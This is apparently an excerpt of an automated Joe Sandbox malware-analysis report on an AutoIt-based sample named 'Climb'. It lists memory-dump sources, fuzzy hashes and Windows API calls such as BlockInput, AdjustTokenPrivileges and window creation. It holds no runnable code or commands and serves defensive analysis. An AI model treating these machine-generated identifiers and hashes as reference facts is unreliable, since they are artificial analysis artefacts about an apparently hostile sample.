                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: NameUser
                                                                                                                                                                          • String ID: X64
                                                                                                                                                                          • API String ID: 2645101109-893830106
                                                                                                                                                                          • Opcode ID: eab3a62a48384c33985ed733ae092aae48e5f65d5bdab78ebc95f1647ad2c5f7
                                                                                                                                                                          • Instruction ID: 5fb7f791318030f0556b08833111e7be0cab06196965ea959d119e1432bcc745
                                                                                                                                                                          • Opcode Fuzzy Hash: eab3a62a48384c33985ed733ae092aae48e5f65d5bdab78ebc95f1647ad2c5f7
                                                                                                                                                                          • Instruction Fuzzy Hash: 75D0C9F480111DEACF94CB50EC88EDD73BCBB04304F110A55F146A2040D77096488B10
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,001352EE,?,?,00000035,?), ref: 00124229
                                                                                                                                                                          • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,001352EE,?,?,00000035,?), ref: 00124239
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorFormatLastMessage
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3479602957-0
                                                                                                                                                                          • Opcode ID: 507b2860cc7dec344f4511121e224a53beae9ac6397d57a315cdc8ead418b15e
                                                                                                                                                                          • Instruction ID: 3b751feeb7a6be2bf8e2f06b92cfb573cf953f48c00040075835a50ed528e442
                                                                                                                                                                          • Opcode Fuzzy Hash: 507b2860cc7dec344f4511121e224a53beae9ac6397d57a315cdc8ead418b15e
                                                                                                                                                                          • Instruction Fuzzy Hash: 27F0E5747002286BEB201766BC4DFEB3A6DEFC5761F000275F505D2291DAB09A40C6B0
                                                                                                                                                                          APIs
                                                                                                                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00111B48), ref: 00111A20
                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,00111B48), ref: 00111A35
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 81990902-0
                                                                                                                                                                          • Opcode ID: daf76f3c21b0e41882494dbc04fcdf47fcba3dd96015b1f3f9c5eaccacd91718
                                                                                                                                                                          • Instruction ID: 1c8c5f7ce89d2e8303f54bffccb803713e13ed1465712f35d405a2a855d23343
                                                                                                                                                                          • Opcode Fuzzy Hash: daf76f3c21b0e41882494dbc04fcdf47fcba3dd96015b1f3f9c5eaccacd91718
                                                                                                                                                                          • Instruction Fuzzy Hash: FEE09A76114610BEEB252B10FC05FB6BBA9EB04311F14892EB59981471DBA26C91DA50
                                                                                                                                                                          APIs
                                                                                                                                                                          • BlockInput.USER32(00000001), ref: 0012F51A
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: BlockInput
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3456056419-0
                                                                                                                                                                          • Opcode ID: f5d26963871f7f73b932dd9909c93d7a04b6a20a52ddb8965ec2b313c456a2c7
                                                                                                                                                                          • Instruction ID: ed2d71f0428c19a47e7d8c428a5026fbd020ab4262acada6e2a900a6dbd0a153
                                                                                                                                                                          • Opcode Fuzzy Hash: f5d26963871f7f73b932dd9909c93d7a04b6a20a52ddb8965ec2b313c456a2c7
                                                                                                                                                                          • Instruction Fuzzy Hash: E3E012352002145FD7109F69E404DD6B7E8AFA57A1F018429F84AD7252D670A9418BA0
                                                                                                                                                                          APIs
                                                                                                                                                                          • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 0011EC95
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: mouse_event
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2434400541-0
                                                                                                                                                                          • Opcode ID: 8a86489267f5a152d4895fe458f6c2e678fac817505b86e93e1bd12da32f08e8
                                                                                                                                                                          • Instruction ID: fabfc3c69cde8d448cf7ed51531881400b078a5cbd4fc12ad49be8ee10f7f431
                                                                                                                                                                          • Opcode Fuzzy Hash: 8a86489267f5a152d4895fe458f6c2e678fac817505b86e93e1bd12da32f08e8
                                                                                                                                                                          • Instruction Fuzzy Hash: FFD05EB619430079E81C0ABC9F2FFF60989E302761F804369F902D96A5EBC199C092A1
                                                                                                                                                                          APIs
                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_00020D51,000D075E), ref: 000D0D4A
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3192549508-0
                                                                                                                                                                          • Opcode ID: 2f7e7e40f6526e659684cbaeb6bd375939514c5fb1721da498fe016ab76a4eba
                                                                                                                                                                          • Instruction ID: 15482b95811ed7d63b9cf5ef6169902d80249cf4dee776987c7312218e0d7e56
                                                                                                                                                                          • Opcode Fuzzy Hash: 2f7e7e40f6526e659684cbaeb6bd375939514c5fb1721da498fe016ab76a4eba
                                                                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                                                                          APIs
                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 0013358D
                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 001335A0
                                                                                                                                                                          • DestroyWindow.USER32 ref: 001335AF
                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 001335CA
                                                                                                                                                                          • GetWindowRect.USER32(00000000), ref: 001335D1
                                                                                                                                                                          • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00133700
                                                                                                                                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 0013370E
                                                                                                                                                                          • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00133755
                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 00133761
                                                                                                                                                                          • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0013379D
                                                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001337BF
                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001337D2
                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001337DD
                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 001337E6
                                                                                                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001337F5
                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 001337FE
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00133805
                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00133810
                                                                                                                                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00133822
                                                                                                                                                                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,00150C04,00000000), ref: 00133838
                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00133848
                                                                                                                                                                          • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 0013386E
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 0013388D
                                                                                                                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001338AF
                                                                                                                                                                          • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00133A9C
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                                                                          • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                                                          • API String ID: 2211948467-2373415609
                                                                                                                                                                          • Opcode ID: f4179b7fe33da8ca853ff4c1df2a70709b2ed613cbe7c34b375709739dbb01bd
                                                                                                                                                                          • Instruction ID: 0f0bad4bc423fbdbd537e1c7c5845494cd570064bf34ce8e66038dcd068a947c
                                                                                                                                                                          • Opcode Fuzzy Hash: f4179b7fe33da8ca853ff4c1df2a70709b2ed613cbe7c34b375709739dbb01bd
                                                                                                                                                                          • Instruction Fuzzy Hash: 5E027975A00205EFEB14DF64DC89EAE7BB9FB49710F008158F915AB2A1CB74AE41CB64
                                                                                                                                                                          APIs
                                                                                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 00147B67
                                                                                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 00147B98
                                                                                                                                                                          • GetSysColor.USER32(0000000F), ref: 00147BA4
                                                                                                                                                                          • SetBkColor.GDI32(?,000000FF), ref: 00147BBE
                                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 00147BCD
                                                                                                                                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 00147BF8
                                                                                                                                                                          • GetSysColor.USER32(00000010), ref: 00147C00
                                                                                                                                                                          • CreateSolidBrush.GDI32(00000000), ref: 00147C07
                                                                                                                                                                          • FrameRect.USER32(?,?,00000000), ref: 00147C16
                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00147C1D
                                                                                                                                                                          • InflateRect.USER32(?,000000FE,000000FE), ref: 00147C68
                                                                                                                                                                          • FillRect.USER32(?,?,?), ref: 00147C9A
                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00147CBC
                                                                                                                                                                            • Part of subcall function 00147E22: GetSysColor.USER32(00000012), ref: 00147E5B
                                                                                                                                                                            • Part of subcall function 00147E22: SetTextColor.GDI32(?,00147B2D), ref: 00147E5F
                                                                                                                                                                            • Part of subcall function 00147E22: GetSysColorBrush.USER32(0000000F), ref: 00147E75
                                                                                                                                                                            • Part of subcall function 00147E22: GetSysColor.USER32(0000000F), ref: 00147E80
                                                                                                                                                                            • Part of subcall function 00147E22: GetSysColor.USER32(00000011), ref: 00147E9D
                                                                                                                                                                            • Part of subcall function 00147E22: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00147EAB
                                                                                                                                                                            • Part of subcall function 00147E22: SelectObject.GDI32(?,00000000), ref: 00147EBC
                                                                                                                                                                            • Part of subcall function 00147E22: SetBkColor.GDI32(?,?), ref: 00147EC5
                                                                                                                                                                            • Part of subcall function 00147E22: SelectObject.GDI32(?,?), ref: 00147ED2
                                                                                                                                                                            • Part of subcall function 00147E22: InflateRect.USER32(?,000000FF,000000FF), ref: 00147EF1
                                                                                                                                                                            • Part of subcall function 00147E22: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00147F08
                                                                                                                                                                            • Part of subcall function 00147E22: GetWindowLongW.USER32(?,000000F0), ref: 00147F15
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4124339563-0
                                                                                                                                                                          • Opcode ID: 16f35c41432204a6a2321c78b82ff6651d92072fdd0f63d243f3b99f71168849
                                                                                                                                                                          • Instruction ID: 19f1211894de9ddf2479fea08dee757b9de9f2b948cac98f33ac53601029aaef
                                                                                                                                                                          • Opcode Fuzzy Hash: 16f35c41432204a6a2321c78b82ff6651d92072fdd0f63d243f3b99f71168849
                                                                                                                                                                          • Instruction Fuzzy Hash: C3A19E76108302AFDB119F64EC48E6BBBB9FF49720F100A19F962A65F0DB71D984CB51
                                                                                                                                                                          APIs
                                                                                                                                                                          • DestroyWindow.USER32(?,?), ref: 000B16B4
                                                                                                                                                                          • SendMessageW.USER32(?,00001308,?,00000000), ref: 000F2B07
                                                                                                                                                                          • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 000F2B40
                                                                                                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 000F2F85
                                                                                                                                                                            • Part of subcall function 000B1802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,000B1488,?,00000000,?,?,?,?,000B145A,00000000,?), ref: 000B1865
                                                                                                                                                                          • SendMessageW.USER32(?,00001053), ref: 000F2FC1
                                                                                                                                                                          • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 000F2FD8
                                                                                                                                                                          • ImageList_Destroy.COMCTL32(00000000,?), ref: 000F2FEE
                                                                                                                                                                          • ImageList_Destroy.COMCTL32(00000000,?), ref: 000F2FF9
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                                                                                                          • String ID: 0
                                                                                                                                                                          • API String ID: 2760611726-4108050209
                                                                                                                                                                          • Opcode ID: 7253759ad0726894cace6dc1bb19a8e06e5a8b1a67bd1fe414d03e1a9c8993b3
                                                                                                                                                                          • Instruction ID: 1a8fc7bcc58b1ec13b6ef6f69c197c01f218a4882438dbcbf1caa5254708571c
                                                                                                                                                                          • Opcode Fuzzy Hash: 7253759ad0726894cace6dc1bb19a8e06e5a8b1a67bd1fe414d03e1a9c8993b3
                                                                                                                                                                          • Instruction Fuzzy Hash: 2412DD30604215AFCB65CF14C8A5BFAB7F1FB45304F584129F685DBA62CB31E882EB91
                                                                                                                                                                          APIs
                                                                                                                                                                          • DestroyWindow.USER32(00000000), ref: 0013319B
                                                                                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 001332C7
                                                                                                                                                                          • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00133306
                                                                                                                                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00133316
                                                                                                                                                                          • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 0013335D
                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 00133369
                                                                                                                                                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 001333B2
                                                                                                                                                                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 001333C1
                                                                                                                                                                          • GetStockObject.GDI32(00000011), ref: 001333D1
                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 001333D5
                                                                                                                                                                          • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 001333E5
                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 001333EE
                                                                                                                                                                          • DeleteDC.GDI32(00000000), ref: 001333F7
                                                                                                                                                                          • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00133423
                                                                                                                                                                          • SendMessageW.USER32(00000030,00000000,00000001), ref: 0013343A
                                                                                                                                                                          • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 0013347A
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0013348E
                                                                                                                                                                          • SendMessageW.USER32(00000404,00000001,00000000), ref: 0013349F
                                                                                                                                                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 001334D4
                                                                                                                                                                          • GetStockObject.GDI32(00000011), ref: 001334DF
                                                                                                                                                                          • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 001334EA
                                                                                                                                                                          • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 001334F4
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                                                          • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                                                          • API String ID: 2910397461-517079104
                                                                                                                                                                          • Opcode ID: 7907ef154bf6578de819bfe2984fdcb1db481b81b49465b2e0e007fb8cb92e1e
                                                                                                                                                                          • Instruction ID: 06f2eef55dc960bbaa4b7dbec470045c346df19f6a688392c36052d7bcef2023
                                                                                                                                                                          • Opcode Fuzzy Hash: 7907ef154bf6578de819bfe2984fdcb1db481b81b49465b2e0e007fb8cb92e1e
                                                                                                                                                                          • Instruction Fuzzy Hash: 80B13E75A00215AFEB14DFA8DC49FAEBBB9FB49710F008114F915E72A1DB74AE40CB64
                                                                                                                                                                          APIs
                                                                                                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 00125532
                                                                                                                                                                          • GetDriveTypeW.KERNEL32(?,0014DC30,?,\\.\,0014DCD0), ref: 0012560F
                                                                                                                                                                          • SetErrorMode.KERNEL32(00000000,0014DC30,?,\\.\,0014DCD0), ref: 0012577B
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorMode$DriveType
                                                                                                                                                                          • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                                                          • API String ID: 2907320926-4222207086
                                                                                                                                                                          • Opcode ID: 2ec0745b86ac16e0ac66a132ba6b19da6046056b18e45e4b934ebd0b734abb0f
                                                                                                                                                                          • Instruction ID: f9b71e899fa28829c33b31ffbc8227e46f75941c428810987a2a2ef297d48854
                                                                                                                                                                          • Opcode Fuzzy Hash: 2ec0745b86ac16e0ac66a132ba6b19da6046056b18e45e4b934ebd0b734abb0f
                                                                                                                                                                          • Instruction Fuzzy Hash: A9610430A88A15EFCB28DF64E9D2DB877B3EF14350F658025E40AAB292D731DD51CB51
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetCursorPos.USER32(?), ref: 00141BC4
                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 00141BD9
                                                                                                                                                                          • GetWindowRect.USER32(00000000), ref: 00141BE0
                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00141C35
                                                                                                                                                                          • DestroyWindow.USER32(?), ref: 00141C55
                                                                                                                                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00141C89
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00141CA7
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00141CB9
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000421,?,?), ref: 00141CCE
                                                                                                                                                                          • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00141CE1
